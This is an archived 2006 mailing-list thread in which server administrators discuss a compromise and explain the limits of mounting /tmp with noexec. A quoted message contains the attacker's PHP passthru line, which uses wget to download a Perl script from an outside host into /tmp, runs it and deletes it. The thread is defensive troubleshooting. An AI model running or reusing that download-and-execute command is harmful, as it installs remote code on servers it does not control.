Article 6868 at 06/09/13 05:36:54 From: dmobley (at mark) uhostme.net Subject: [coba-e:06868] Re: /TMP Directory

Index: [Article Count Order] [Thread]
Date:  Tue, 12 Sep 2006 16:36:41 -0400
From:  "Darrell D. Mobley" <dmobley (at mark) uhostme.net>
Subject:  [coba-e:06868] Re: /TMP Directory
To:  <coba-e (at mark) bluequartz.org>
Message-Id:  <007801c6d6ab$2812cbf0$6400a8c0@YOUR4105E587B6>
In-Reply-To:  <200609121515.16088.keb (at mark) pa.net>
X-Mail-Count: 06868

I suppose that the call to perl to run the v6.txt script is being done as
the user "nobody" since it was trying to execute out of a PHP script.
Wonderful.

> -----Original Message-----
> From: Kevin Bonner [mailto:keb (at mark) pa.net]
> Sent: Tuesday, September 12, 2006 3:15 PM
> To: coba-e (at mark) bluequartz.org
> Subject: [coba-e:06866] Re: /TMP Directory
> 
> On Saturday 09 September 2006 16:44, Darrell D. Mobley wrote:
> >  passthru('cd /tmp;wget http://perqafohu.com/~armendibx/oki/v6.txt;perl
> > v6.txt;rm -f v6*');
> > [::snip::]
> > The v6.txt is a Perl script that installs some IRC software and monitors
> > IRC on open ports.  I do not think the script was successful in running,
> > but I just want to make sure the /TMP security is enabled where files
> can't
> > be run there.  While I don't think the DDOS attack was successful in
> > running the script, it was successful in shutting down the serer due to
> > MySQL becoming overwhelmed.  Server load was up to 156!
> >
> > Any suggestions would be appreciated.
> 
> Having /tmp flags of noexec,nosuid helps against the clueless script
> kiddies,
> but in your case it wouldn't prevent the code in v6.txt from being
> executed.
> 
> One example:
> [root tmp]# mount | grep /tmp
> /home/dev/tmpMnt on /home/tmp type ext2 (rw,noexec,nosuid,loop=/dev/loop0)
> [root tmp]# pwd
> /home/tmp
> [root tmp]# ls -l hi.pl
> -rw-r--r--    1 root     root           40 Sep 12 15:02 hi.pl
> [root tmp]# cat hi.pl
> #!/usr/bin/perl
> print "Hello World!\n";
> [root tmp]# perl hi.pl
> Hello World!
> [root tmp]#
> 
> My /tmp has noexec and yet I'm still able to execute the perl script.
> This is
> because the perl program is being executed (from /usr/bin/perl) and it's
> interpreting the commands in the hi.pl file.  If I were to make hi.pl
> executable and try to execute that file directly, it would be denied.
> 
> [root tmp]# chmod 755 hi.pl
> [root tmp]# ls -l hi.pl
> -rwxr-xr-x    1 root     root           40 Sep 12 15:02 hi.pl
> [root tmp]# ./hi.pl
> sh: ./hi.pl: Permission denied
> [root tmp]#
> 
> Hopefully this helps you understand a little more about the capabilities
> and
> limitations of the noexec flag on a mounted partition.
> 
> Kevin Bonner